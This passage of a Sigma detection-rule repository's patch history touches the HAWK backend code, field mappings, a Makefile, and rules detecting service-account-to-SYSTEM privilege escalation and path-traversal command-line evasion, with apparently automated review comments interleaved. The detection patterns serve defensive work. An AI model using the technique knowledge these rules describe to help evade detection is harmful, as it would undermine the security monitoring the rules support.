"columns" }, + "comparison" : { "order" : "1", "source" : "comparison", "type" : "comparison", "objectKey" : "comparison" }, + "threshold" : { "order" : "2", "source" : "", "type" : "int", "objectKey" : "threshold" }, + "limit" : { "order" : "3", "source" : "time_offset", "type" : "int", "objectKey" : "limit" }, + }, + "args": { + "columns" : [ self.cleanKey(agg.groupfield) ], + "comparison": { "value": "%s" % agg.cond_op }, + "threshold": { "value": int(agg.condition) }, + "limit": { "value": min_count } + } + } + nodeRet['rule_id'] = str(uuid.uuid4()) + #print("No time range set") + return nodeRet elif agg.groupfield != None and timeframe != None: for key, duration in self.generateTimeframe(timeframe).items(): - self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) - self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) - return self.prefixAgg, self.suffixAgg + min_count = 60 + if key.lower() == 'hours': + min_count = 24 * int(duration) + nodeRet = {"key": "atomic_counter", "description": self.cleanKey(agg.groupfield) + " %s aggregation stream counter" % agg.aggfunc_notrans, "class": "function", "return": "int", + "inputs": { + "columns" : { "order" : "0", "source" : "columns", "type" : "array", "objectKey" : "columns" }, + "comparison" : { "order" : "1", "source" : "comparison", "type" : "comparison", "objectKey" : "comparison" }, + "threshold" : { "order" : "2", "source" : "", "type" : "int", "objectKey" : "threshold" }, + "limit" : { "order" : "3", "source" : "time_offset", "type" : "int", "objectKey" : "limit" }, + }, + "args": { + "columns" : [ self.cleanKey(agg.groupfield) ], + "comparison": { "value": "%s" % agg.cond_op }, + "threshold": { "value": int(agg.condition) }, + "limit": { "value": min_count } + } + } + nodeRet['rule_id'] = str(uuid.uuid4()) + #self.prefixAgg = " SELECT %s(%s) as 
agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) + #self.suffixAgg = " group by %s having agg_val %s %s LAST %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition, duration, key) + #print("Group field and timeframe") + #return self.prefixAgg, self.suffixAgg + return nodeRet else: self.prefixAgg = " SELECT %s(%s) as agg_val from %s where " % (agg.aggfunc_notrans, self.cleanKey(agg.aggfield), self.aql_database) self.suffixAgg = " group by %s having agg_val %s %s" % (self.cleanKey(agg.groupfield), agg.cond_op, agg.condition) + #print("Last option") + raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") return self.prefixAgg, self.suffixAgg - """ #print(agg) raise NotImplementedError("The 'agg' aggregation operator is not yet implemented for this backend") 
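Review bot: The new guard admits `sum`, but neither branch that builds `nodeRet` references `agg.aggfield` — both emit an `atomic_counter` over `[ self.cleanKey(agg.groupfield) ]` — so `sum(field) by group` is silently converted into a count by group, and the only remaining uses of `aggfield` are in the dead `self.prefixAgg` strings; either reject `sum` until the backend can express it or document the substitution. The guard also runs before the `AGGFUNC_NEAR` check, so that `return None` is unreachable (`near` has an `aggfunc_notrans` other than count/sum), and `agg.groupfield = "priority"` mutates the parser's aggregation object as a side effect of generating output. The two `nodeRet` literals are identical apart from `min_count`, the `for key, duration in self.generateTimeframe(timeframe).items()` loop returns on its first iteration, and `24 * int(duration)` for hours against a default of 60 looks like a unit mix-up worth a comment once the unit of `limit` is confirmed; the sketch below removes the duplication and restores the ordering. `return self.prefixAgg, self.suffixAgg` in the final `else` is unreachable after the `raise` and should go.
```python
def _counter_node(self, agg, limit):
    """Build the HAWK atomic_counter node for a grouped count aggregation.

    limit is the value placed in args.limit; its unit follows the backend's
    time_offset input — TODO confirm before changing the hours conversion.
    """
    group = self.cleanKey(agg.groupfield)
    return {
        "key": "atomic_counter",
        "description": group + " %s aggregation stream counter" % agg.aggfunc_notrans,
        "class": "function",
        "return": "int",
        "inputs": {
            "columns": {"order": "0", "source": "columns", "type": "array", "objectKey": "columns"},
            "comparison": {"order": "1", "source": "comparison", "type": "comparison", "objectKey": "comparison"},
            "threshold": {"order": "2", "source": "", "type": "int", "objectKey": "threshold"},
            "limit": {"order": "3", "source": "time_offset", "type": "int", "objectKey": "limit"},
        },
        "args": {
            "columns": [group],
            "comparison": {"value": "%s" % agg.cond_op},
            "threshold": {"value": int(agg.condition)},
            "limit": {"value": limit},
        },
        "rule_id": str(uuid.uuid4()),
    }

def generateAggregation(self, agg, timeframe='00'):
    if agg is None:
        return None
    # near is checked first so the operator test below cannot mask it
    if agg.aggfunc == sigma.parser.condition.SigmaAggregationParser.AGGFUNC_NEAR:
        return None
    if agg.aggfunc_notrans.lower() not in ("count", "sum"):
        raise NotImplementedError("This aggregation operator '%s' has not been implemented" % agg.aggfunc_notrans)
    # … unchanged: groupfield default …
    if agg.groupfield != None and timeframe == '00':
        return self._counter_node(agg, 60)
    elif agg.groupfield != None and timeframe != None:
        for key, duration in self.generateTimeframe(timeframe).items():
            min_count = 24 * int(duration) if key.lower() == 'hours' else 60
            return self._counter_node(agg, min_count)
    # … unchanged: final NotImplementedError …
```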
@@ -416,20 +465,42 @@ class HAWKBackend(SingleTextQueryBackend): mapped = None pass - #if parsed.parsedAgg: #and timeframe == None: - # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg) - # result = prefix + result - # result += suffixAgg - #elif parsed.parsedAgg != None and timeframe != None: - # (prefix, suffixAgg) = self.generateAggregation(parsed.parsedAgg, timeframe) - # result = prefix + result - # result += suffixAgg - #else: - # result = prefix + result + try: + timeframe = sigmaparser.parsedyaml['detection']['timeframe'] + except: + timeframe = None + + if parsed.parsedAgg and timeframe == None: + addition = self.generateAggregation(parsed.parsedAgg) + #print(addition) + #print(result) + if addition: + if not 'children' in result: + rec = self.subExpression % json.dumps(result) + result = json.loads(rec) + #print(result) + result['children'].append(addition) + elif parsed.parsedAgg: + #print(result) + raise Exception("No agg returned, something is off") + elif parsed.parsedAgg != None and timeframe != None: + addition = self.generateAggregation(parsed.parsedAgg, timeframe) + #print(addition) + #print(result) + if addition: + #print(result) + if not 'children' in result: + rec = self.subExpression % json.dumps(result) + result = json.loads(rec) + #print(result) + result['children'].append(addition) + elif parsed.parsedAgg: + #print(result) + raise Exception("No agg returned, something is off") + else: + # result = prefix + result + pass - #print(result) - #print("Prefix: ", prefix) - # result = prefix + json.dumps(result) result = json.dumps(result) analytic_txt = ret + result + ret2 # json.dumps(ret) 
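Review bot: The bare `except:` around `sigmaparser.parsedyaml['detection']['timeframe']` should be `except (KeyError, TypeError):` — a missing key is the only expected failure, and a bare clause also swallows `KeyboardInterrupt`. The `timeframe == None` and `timeframe != None` branches are line-for-line copies differing only in whether `timeframe` is passed to `generateAggregation`, and with the indentation lost it is unclear whether each `elif parsed.parsedAgg:` is an inner clause (then it is always true there and is really `else`) or an outer one (then the second branch is unreachable, since the first `elif` catches every truthy `parsedAgg`); either way the structure below collapses it into one path. `raise Exception("No agg returned, something is off")` should be `NotImplementedError` or the backend's own error type so the `(NotImplementedError, TypeError)` handler in sigmac can classify it, and `json.loads(self.subExpression % json.dumps(result))` is a text round-trip of a dict that could be built directly. The enclosing method starts and ends outside the hunk.
```python
try:
    timeframe = sigmaparser.parsedyaml['detection']['timeframe']
except (KeyError, TypeError):
    timeframe = None

if parsed.parsedAgg:
    if timeframe is None:
        addition = self.generateAggregation(parsed.parsedAgg)
    else:
        addition = self.generateAggregation(parsed.parsedAgg, timeframe)
    if not addition:
        raise NotImplementedError("No agg returned, something is off")
    if 'children' not in result:
        # promote the single node into a sub-expression that can take children
        result = json.loads(self.subExpression % json.dumps(result))
    result['children'].append(addition)
# … unchanged: result = json.dumps(result) …
```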
@@ -473,7 +544,7 @@ class HAWKBackend(SingleTextQueryBackend): "hawk_id" : sigmaparser.parsedyaml['id'] } if 'tags' in sigmaparser.parsedyaml: - record["tags"] = sigmaparser.parsedyaml['tags'] + record["tags"] = [ item.replace("attack.", "") for item in sigmaparser.parsedyaml['tags']] if not 'status' in self.sigmaparser.parsedyaml or 'status' in self.sigmaparser.parsedyaml and self.sigmaparser.parsedyaml['status'] != 'experimental': record['correlation_action'] += 10.0; From 22b64644ef5efc072b554958f5a079712a39833a Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 15:09:47 +0000 Subject: [PATCH 1339/1367] updating hawk backend to fix open ended backslash for regex --- tools/sigma/backends/hawk.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 5fd7a5f0..12c2d9d5 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -182,6 +182,7 @@ class HAWKBackend(SingleTextQueryBackend): elif type(value) == str and "*" in value: # value = value.replace("*", ".*") value = value.replace("*", "") + value = value.replace("\\", "\\\\") if notNode: nodeRet["args"]["comparison"]["value"] = "!regex" else: @@ -231,6 +232,7 @@ class HAWKBackend(SingleTextQueryBackend): ret['children'].append( nodeRet ) elif type(item) == str and "*" in item: item = item.replace("*", "") + item = value.replace("\\", "\\\\") # item = item.replace("*", ".*") #print("item") #print(item) @@ -265,7 +267,7 @@ class HAWKBackend(SingleTextQueryBackend): return "%s imatches %s" % (self.cleanKey(fieldname), self.generateValueNode(regex, True)) """ #print("ENDS WITH!!!") - nodeRet['args']['str']['value'] = self.generateValueNode(regex, True) + nodeRet['args']['str']['value'] = self.generateValueNode(regex, True).replace("\\", "\\\\") if notNode: nodeRet["args"]["comparison"]["value"] = "!regex" else: From 0d65dcdc281ca3260a5eece306f8fd9de0bf1c47 Mon Sep 17 00:00:00 2001 
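Review bot: `item.replace("attack.", "")` strips the substring wherever it occurs rather than only the `attack.` namespace prefix, and it passes tags from other namespaces through unchanged, so HAWK receives a mixed list of bare technique ids and prefixed tags; if the intent is to turn `attack.t1134` into `t1134`, use a prefix test, `record["tags"] = [item[len("attack."):] if item.startswith("attack.") else item for item in sigmaparser.parsedyaml['tags']]`, and decide explicitly whether non-ATT&CK tags are dropped or kept. The method that builds `record` starts outside the hunk.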
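Review bot: In the `@@ -182` hunk `value.replace("\\", "\\\\")` doubles every backslash so a literal `\` survives regex compilation, but the other regex metacharacters that routinely occur in Sigma values (`.` in `.exe`, `(`, `)`, `+`, `?`, `$`) remain unescaped, so `\.exe` still matches `\Xexe` and an unbalanced `(` can yield an invalid pattern; if the value is meant literally, escape it as a whole — `re.escape(value)` after the `*` removal — rather than fixing one character class, and the same applies to the `@@ -231` and `@@ -265` hunks of this commit and to the `@@ -94` hunk of the "missed one" commit below. Doubling backslashes on the output of `self.generateValueNode(regex, True)` also re-escapes whatever that helper already escaped, which cannot be judged from here because its body is outside the hunk.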
From: Tim Shelton Date: Tue, 26 Oct 2021 15:12:03 +0000 Subject: [PATCH 1340/1367] fixx err --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index 12c2d9d5..a65837e7 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -232,7 +232,7 @@ class HAWKBackend(SingleTextQueryBackend): ret['children'].append( nodeRet ) elif type(item) == str and "*" in item: item = item.replace("*", "") - item = value.replace("\\", "\\\\") + item = item.replace("\\", "\\\\") # item = item.replace("*", ".*") #print("item") #print(item) From 7fc2a6f00d286b50833fae5c138a4ddce4e9349b Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 15:25:11 +0000 Subject: [PATCH 1341/1367] missed one --- tools/sigma/backends/hawk.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py index a65837e7..7147ff37 100644 --- a/tools/sigma/backends/hawk.py +++ b/tools/sigma/backends/hawk.py @@ -94,7 +94,7 @@ class HAWKBackend(SingleTextQueryBackend): # they imply the entire payload nodeRet['description'] = key nodeRet['rule_id'] = str(uuid.uuid4()) - nodeRet['args']['str']['value'] = self.generateValueNode(node, False) + nodeRet['args']['str']['value'] = self.generateValueNode(node, False).replace("\\","\\\\") # return json.dumps(nodeRet) return nodeRet elif type(node) == list: From 893874d3a5c30120881cfa277bebd333758c8664 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 16:25:50 +0000 Subject: [PATCH 1342/1367] removing item with space, and removing duplicate item and fixing target field, thx to frack113 --- tools/config/hawk.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml index 2b1f8f6f..0bbc0a23 100644 --- a/tools/config/hawk.yml +++ b/tools/config/hawk.yml 
@@ -148,7 +148,6 @@ fieldmappings: Application: image ProcessName: image TargetImage: target_image - Parent Image: parent_image ParentImage: parent_image Caller Process Name: parent_image CallerProcessName: parent_image @@ -171,7 +170,6 @@ fieldmappings: ServiceName: service_name Service: service_name ServiceFileName: filename - TargetObject: target_object EventID: vendor_id SourceImage: parent_image Description: image_description @@ -192,7 +190,7 @@ fieldmappings: Signed: signature Status: value TargetFilename: filename - TargetObject: object + TargetObject: object_target ObjectClass: object_type ObjectValueName: object_name ObjectName: object_name From 8f22d418f3cfa97e9742b8f1b73878ce0751050d Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 16:28:04 +0000 Subject: [PATCH 1343/1367] fixing lingering item --- tools/config/hawk.yml | 1 - 1 file changed, 1 deletion(-) diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml index 0bbc0a23..a9e7b9e0 100644 --- a/tools/config/hawk.yml +++ b/tools/config/hawk.yml @@ -149,7 +149,6 @@ fieldmappings: ProcessName: image TargetImage: target_image ParentImage: parent_image - Caller Process Name: parent_image CallerProcessName: parent_image ParentProcessName: parent_image CommandLine: command From 6ce82ab780d1845ef0af5962fbaad30de260431a Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Tue, 26 Oct 2021 19:37:22 +0200 Subject: [PATCH 1344/1367] Add athena coverage --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index e8390afd..7388a0d2 100644 --- a/Makefile +++ b/Makefile 
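Review bot: The repeated `TargetObject` keys removed here were never both in effect — PyYAML keeps the last occurrence of a duplicated mapping key, so only whichever came last was used — which is how the mapping could change silently; a check that the `fieldmappings` block contains no repeated keys (a loader that rejects duplicates, or a test over `tools/config/*.yml`) would catch the next one before it reaches a backend. The new target `object_target` appears only in this hunk, so it is worth confirming against the backend's field list, which is not visible here.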
@@ -52,6 +52,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t lacework rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t mdatp rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t uberagent rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t athena -c tools/config/athena.yml rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala-rule rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t ala --backend-config tests/backend_config.yml rules/windows/process_creation/ > /dev/null From 9b6be31c8d9b6b69c7f88ae3a71fd24749f36252 Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 18:25:23 +0000 Subject: [PATCH 1345/1367] commenting out exceptions output from handling --- tools/sigma/sigmac.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 6a153a6f..167ae7af 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -368,7 +368,7 @@ def main(): sys.exit(error) except (NotImplementedError, TypeError) as e: print("An unsupported feature is required for this Sigma rule (%s): " % (sigmafile) + str(e), file=sys.stderr) - traceback.print_exc() + # traceback.print_exc() logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile)) success = False if not cmdargs.ignore_backend_errors: From 860b4b2bb99b71b9de79998d9c96dc8ba82546ec Mon Sep 17 00:00:00 2001 From: Tim Shelton Date: Tue, 26 Oct 2021 20:26:29 +0000 Subject: [PATCH 1346/1367] adding hawk to makefile fore coverage --- Makefile | 1 + 1 file changed, 1 insertion(+) diff --git a/Makefile b/Makefile index e8390afd..3b48f32a 100644 --- a/Makefile +++ b/Makefile 
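Review bot: Commenting out `traceback.print_exc()` removes the only place the backend's stack is shown for an unsupported-feature failure, and leaves a dead line behind; since a `logger.debug` call already follows, keep the diagnostics behind that switch instead: `logger.debug("* Convertion Sigma input %s FAILURE" % (sigmafile), exc_info=True)` emits the traceback only when debug logging is on and lets the commented line be deleted. The handler sits inside `main()`, which starts and ends outside the hunk.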
@@ -99,6 +99,7 @@ test-sigmac: $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/filebeat-defaultindex.yml -t xpack-watcher rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/splunk-windows.yml -t splunk rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/generic/sysmon.yml -c tools/config/splunk-windows.yml -t splunk rules/ > /dev/null + $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -c tools/config/hawk.yml -t hawk rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t grep rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -rvdI -t fieldlist rules/ > /dev/null $(COVERAGE) run -a --include=$(COVSCOPE) tools/sigmac -t xpack-watcher -c tools/config/winlogbeat.yml -O output=plain -O es=es -O foobar rules/windows/builtin/win_susp_failed_logons_single_source.yml > /dev/null From 5aac1b6879ac43d279dc953f5e26a3d11086275e Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Wed, 27 Oct 2021 01:04:24 -0400 Subject: [PATCH 1347/1367] Unsupported rule now possible with Sysmonv13.30 --- .../win_susp_child_process_as_system_.yml | 33 +++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 rules/windows/process_creation/win_susp_child_process_as_system_.yml diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml new file mode 100644 index 00000000..2b867d67 --- /dev/null +++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml 
@@ -0,0 +1,33 @@ +title: Suspicious Child Process Created as System +id: 590a5f4c-6c8c-4f10-8307-89afe9453a9d +description: Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts +references: + - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment + - https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/ + - https://github.com/antonioCoco/RogueWinRM + - https://twitter.com/Cyb3rWard0g/status/1453123054243024897 +tags: + - attack.privilege_escalation + - attack.t1134 # an old one + - attack.t1134.002 +status: experimental +author: Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR) +date: 2019/10/26 +modified: 2020/10/26 +logsource: + category: process_creation + product: windows +detection: + selection: + ParentUser: + - 'NT AUTHORITY\NETWORK SERVICE' + - 'NT AUTHORITY\LOCAL SERVICE' + - 'AUTORITE NT\Sys' # French language settings + User: 'NT AUTHORITY\SYSTEM' + rundllexception: + Image|endswith: '\rundll32.exe' + CommandLine|contains: 'DavSetCookie' + condition: selection and not rundllexception +falsepositives: + - Unknown +level: high \ No newline at end of file From 9c7a736ca69afd234bbbe9af02c5ec6b18644bc6 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Wed, 27 Oct 2021 01:06:37 -0400 Subject: [PATCH 1348/1367] added integrity level for user --- .../process_creation/win_susp_child_process_as_system_.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml index 2b867d67..d7a31c2b 100644 --- a/rules/windows/process_creation/win_susp_child_process_as_system_.yml +++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml 
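Review bot: `'AUTORITE NT\Sys'` under `ParentUser` is a plain value, and a plain Sigma value without a wildcard is an exact (case-insensitive) match, so it never matches the full French account name it is truncated from; it needs a trailing wildcard, `'AUTORITE NT\Sys*'`, and for a prefix-only form the backslash must be doubled, `'AUTORITE NT\\*'`, because `\*` alone is Sigma's escaped literal asterisk. The later hunks that rework this value — `@@ -22,8 +22,9 @@` moving it under `User` and `@@ -17,11 +17,13 @@` adding `'AUTORITE NT\'` to `ParentUser` — carry the same problem. `modified: 2020/10/26` predates both the commit and the Sysmon 13.30 `ParentUser` field the rule depends on, so it is probably meant to read 2021; the file also lacks a trailing newline.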
@@ -24,6 +24,7 @@ detection: - 'NT AUTHORITY\LOCAL SERVICE' - 'AUTORITE NT\Sys' # French language settings User: 'NT AUTHORITY\SYSTEM' + IntegrityLevel: 'System' rundllexception: Image|endswith: '\rundll32.exe' CommandLine|contains: 'DavSetCookie' From d80f73625fcdcd9d5aad8805572b4b261210070a Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Wed, 27 Oct 2021 01:22:19 -0400 Subject: [PATCH 1349/1367] Added the right System string to User filter --- .../process_creation/win_susp_child_process_as_system_.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml index d7a31c2b..241bcc8e 100644 --- a/rules/windows/process_creation/win_susp_child_process_as_system_.yml +++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml @@ -22,8 +22,9 @@ detection: ParentUser: - 'NT AUTHORITY\NETWORK SERVICE' - 'NT AUTHORITY\LOCAL SERVICE' + User: + - 'NT AUTHORITY\SYSTEM' - 'AUTORITE NT\Sys' # French language settings - User: 'NT AUTHORITY\SYSTEM' IntegrityLevel: 'System' rundllexception: Image|endswith: '\rundll32.exe' From eb4ef6bcfc81c14101f4a78436ae907bfe8d834b Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 27 Oct 2021 11:16:12 +0200 Subject: [PATCH 1350/1367] fix: single list item to value --- .../process_creation/win_commandline_path_obfuscation.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_commandline_path_obfuscation.yml b/rules/windows/process_creation/win_commandline_path_obfuscation.yml index 70fa5a9d..8fcf0948 100644 --- a/rules/windows/process_creation/win_commandline_path_obfuscation.yml +++ b/rules/windows/process_creation/win_commandline_path_obfuscation.yml 
@@ -15,8 +15,7 @@ logsource: product: windows detection: selection1: - Image|contains: - - '\Windows\' + Image|contains: '\Windows\' CommandLine|contains: - '\..\Windows\' - '\..\System32\' From ce5e4c45f13f0065cb9724497518d94549695149 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 27 Oct 2021 12:58:10 +0200 Subject: [PATCH 1351/1367] Add sysmon 13.30 ParentUser --- tools/config/winlogbeat-modules-enabled.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index a917b4c6..8bf9155f 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -185,6 +185,7 @@ fieldmappings: ParentProcessId: process.parent.pid ParentImage: process.parent.executable ParentCommandLine: process.parent.command_line + ParentUser: winlog.event_data.ParentUser #Sysmon 13.30 TargetFilename: file.path CreationUtcTime: winlog.event_data.CreationUtcTime PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime From 8b1279448682019f84b4ad0373c289c16af893c7 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 27 Oct 2021 14:07:27 +0200 Subject: [PATCH 1352/1367] fix: change title and filename --- ...scation.yml => win_commandline_path_traversal_evasion.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/windows/process_creation/{win_commandline_path_obfuscation.yml => win_commandline_path_traversal_evasion.yml} (79%) diff --git a/rules/windows/process_creation/win_commandline_path_obfuscation.yml b/rules/windows/process_creation/win_commandline_path_traversal_evasion.yml similarity index 79% rename from rules/windows/process_creation/win_commandline_path_obfuscation.yml rename to rules/windows/process_creation/win_commandline_path_traversal_evasion.yml index 8fcf0948..0ddf5aa8 100644 --- a/rules/windows/process_creation/win_commandline_path_obfuscation.yml 
+++ b/rules/windows/process_creation/win_commandline_path_traversal_evasion.yml @@ -1,9 +1,9 @@ -title: Command Line Path Obfuscation +title: Command Line Path Traversial Evasion status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -description: Detects the attempt to hide or obfuscate the executed command on the CommandLine using bogus path traversal +description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 - https://twitter.com/Gal_B1t/status/1062971006078345217 From c228cde0cbef0397e451bc5fe5294c0cf34bb21d Mon Sep 17 00:00:00 2001 
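Review bot: The new title `Command Line Path Traversial Evasion` misspells "Traversal" — the renamed filename in the same commit spells it correctly — so the line should read `title: Command Line Path Traversal Evasion`. The rest of the hunk only rewords `description`.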
From: frack113 Date: Wed, 27 Oct 2021 14:38:51 +0200 Subject: [PATCH 1353/1367] Move to correct directory --- rules/linux/{ => process_creation}/lnx_base64_decode.yml | 0 rules/linux/{ => process_creation}/lnx_clear_logs.yml | 0 .../{ => process_creation}/lnx_file_and_directory_discovery.yml | 0 rules/linux/{ => process_creation}/lnx_file_deletion.yml | 0 .../linux/{ => process_creation}/lnx_install_root_certificate.yml | 0 rules/linux/{ => process_creation}/lnx_local_account.yml | 0 rules/linux/{ => process_creation}/lnx_local_groups.yml | 0 .../linux/{ => process_creation}/lnx_network_service_scanning.yml | 0 rules/linux/{ => process_creation}/lnx_process_discovery.yml | 0 .../linux/{ => process_creation}/lnx_remote_system_discovery.yml | 0 rules/linux/{ => process_creation}/lnx_schedule_task_job_cron.yml | 0 .../{ => process_creation}/lnx_security_software_discovery.yml | 0 .../linux/{ => process_creation}/lnx_security_tools_disabling.yml | 0 rules/linux/{ => process_creation}/lnx_system_info_discovery.yml | 0 .../lnx_system_network_connections_discovery.yml | 0 .../process_creation_stordiag_execution.yml | 0 16 files changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{ => process_creation}/lnx_base64_decode.yml (100%) rename rules/linux/{ => process_creation}/lnx_clear_logs.yml (100%) rename rules/linux/{ => process_creation}/lnx_file_and_directory_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_file_deletion.yml (100%) rename rules/linux/{ => process_creation}/lnx_install_root_certificate.yml (100%) rename rules/linux/{ => process_creation}/lnx_local_account.yml (100%) rename rules/linux/{ => process_creation}/lnx_local_groups.yml (100%) rename rules/linux/{ => process_creation}/lnx_network_service_scanning.yml (100%) rename rules/linux/{ => process_creation}/lnx_process_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_remote_system_discovery.yml (100%) rename rules/linux/{ => 
process_creation}/lnx_schedule_task_job_cron.yml (100%) rename rules/linux/{ => process_creation}/lnx_security_software_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_security_tools_disabling.yml (100%) rename rules/linux/{ => process_creation}/lnx_system_info_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_system_network_connections_discovery.yml (100%) rename rules/windows/{ => process_creation}/process_creation_stordiag_execution.yml (100%) diff --git a/rules/linux/lnx_base64_decode.yml b/rules/linux/process_creation/lnx_base64_decode.yml similarity index 100% rename from rules/linux/lnx_base64_decode.yml rename to rules/linux/process_creation/lnx_base64_decode.yml diff --git a/rules/linux/lnx_clear_logs.yml b/rules/linux/process_creation/lnx_clear_logs.yml similarity index 100% rename from rules/linux/lnx_clear_logs.yml rename to rules/linux/process_creation/lnx_clear_logs.yml diff --git a/rules/linux/lnx_file_and_directory_discovery.yml b/rules/linux/process_creation/lnx_file_and_directory_discovery.yml similarity index 100% rename from rules/linux/lnx_file_and_directory_discovery.yml rename to rules/linux/process_creation/lnx_file_and_directory_discovery.yml diff --git a/rules/linux/lnx_file_deletion.yml b/rules/linux/process_creation/lnx_file_deletion.yml similarity index 100% rename from rules/linux/lnx_file_deletion.yml rename to rules/linux/process_creation/lnx_file_deletion.yml diff --git a/rules/linux/lnx_install_root_certificate.yml b/rules/linux/process_creation/lnx_install_root_certificate.yml similarity index 100% rename from rules/linux/lnx_install_root_certificate.yml rename to rules/linux/process_creation/lnx_install_root_certificate.yml diff --git a/rules/linux/lnx_local_account.yml b/rules/linux/process_creation/lnx_local_account.yml similarity index 100% rename from rules/linux/lnx_local_account.yml rename to rules/linux/process_creation/lnx_local_account.yml 
